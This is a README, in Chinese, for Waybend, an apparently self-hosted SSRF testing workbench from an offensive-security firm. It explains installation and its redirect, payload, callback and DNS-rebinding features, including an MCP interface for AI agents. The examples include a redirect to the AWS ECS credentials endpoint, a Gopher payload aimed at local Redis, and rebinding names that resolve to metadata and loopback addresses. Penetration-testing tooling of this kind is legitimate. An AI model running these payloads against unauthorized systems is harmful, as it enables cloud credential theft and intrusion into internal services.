自托管 SSRF 重定向、payload、回调与 DNS 工作台
自托管的 SSRF 基础设施,用于重定向链、精确协议载荷、 回调、DNS 重绑定和请求证据。单个 Rust 二进制文件提供 Web 工作台、JSON API、权威 DNS 响应器和 stdio MCP 接口。
使用 Homebrew 安装:
brew install principlebreach/tap/waybend
带标签的发布版本还会在
releases 页面上发布适用于 Linux、macOS 和 Windows 的签名二进制文件,以及
位于 ghcr.io/principlebreach/waybend 的多平台容器。
使用 Rust 1.88 或更高版本从源码构建:
git clone https://github.com/PrincipleBreach/waybend.git
cd waybend
cargo build --release --locked
waybend init waybend.yml
waybend validate --config waybend.yml
waybend serve --config waybend.yml
打开 http://localhost:8080。每个目录条目都会显示可直接复制的
Waybend URL 及其精确的最终目标:
Waybend URL http://localhost:8080/r/aws-ecs-v2?token=case-17
Final target http://169.254.170.2/v2/credentials/
使用 Docker Compose 进行持久化的本地部署:
cp waybend.example.yml waybend.yml
docker compose up --build -d
有关容器、原生二进制文件、 验证和首次重定向测试,请参阅快速入门。
目录涵盖云元数据、环回和私有网络地址形式、 URL 解析器差异、本地文件目标和协议框架的 Gopher 路由。 协议边界和主要参考资料记录在 协议载荷中。
无需启动服务器即可搜索或导出目录:
waybend catalog --config waybend.yml --query metadata
waybend catalog --config waybend.yml --category internal-service --format csv
构建保留字节的动态重定向:
waybend encode --config waybend.yml --status 307 --hops 2 \
'Gopher://127.0.0.1:6379/_INFO%0D%0APING'
使用 ?token=<value> 关联路由,然后查询其观察结果:
waybend evidence --config waybend.yml list --token case-17 --json
运行 waybend --help 或 waybend <command> --help 查看已安装的命令
界面。
启动标准输入/输出 MCP 服务器:
waybend mcp --config /absolute/path/to/waybend.yml
它暴露 search_payloads、get_payload、build_redirect、
dns_rebind_name 和 list_evidence。
Waybend 技能指导代理选择聚焦的
载荷集、保留协议字节、复用一个关联令牌,并报告
观察到的证据。
有关 MCP 客户端配置、 工具模式和技能安装,请参阅代理集成。
将区域委派给 Waybend,启用 DNS,并发布 UDP 和 TCP 端口 53。 查询名称编码静态、交替或确定性的 TOCTOU 行为:
127-0-0-1.static.rb.example.com
198-51-100-10.127-0-0-1.alt.rb.example.com
198-51-100-10.169-254-169-254.2.toctou.rb.example.com
在名称前加上 t-<token>. 以关联 DNS 和 HTTP 证据。有关委派、IPv6 编码和序列规则,请参阅
DNS 重绑定。
阅读 CONTRIBUTING.md。通过 SECURITY.md 报告漏洞。
MIT — 参见 LICENSE。
由 Principle Breach 构建 — 攻击性安全研究。